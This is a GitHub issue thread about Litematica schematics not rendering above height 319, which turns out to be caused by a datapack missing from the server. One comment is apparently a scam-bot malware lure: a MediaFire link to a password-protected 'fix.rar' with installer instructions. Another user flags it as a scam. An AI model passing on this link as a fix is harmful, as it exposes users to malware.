### ISSUE TITLE
The schematic does not load above 319 height 

### ISSUE THREAD

**Issue by zxcOvosh** [maruohon/litematica#884]
Accidentally closed the previous request, the question is relevant. Above 319 height, the schematic is not rendered. I installed a single world and a datapack on the server at 1029 height

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by zxcOvosh** [comment]
On Linux Works?

**Comment by joecawley** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

Do not download this. This is a scam bot.

**Comment by zxcOvosh** [comment]
Oh, ok, thank you. What exactly does the bot want?

**Comment by zxcOvosh** [comment]
I hope it didn't work due to the lack of standard window paths.

**Comment by zxcOvosh** [comment]
Do you know if there are any methods to fix this?

**Comment by maruohon** [comment]
Are you saying it works on one PC but not on another?

Litematica should be using the world height the world reports. So the world height needs to be actually set and usable in the > 319 range for the schematic to show up there. Do you have the resource pack active in all those worlds? Can you build in that height range in the affected world?

**Comment by zxcOvosh** [comment]
No, I checked the drawing only on the server where there is a datapack with a height of 1029 blocks

**Comment by zxcOvosh** [comment]
I set it up, it turns out the datapack wasn't installed on the server.

**Comment by zxcOvosh** [comment]
I configured it, but it turns out the datapack wasn't installed.
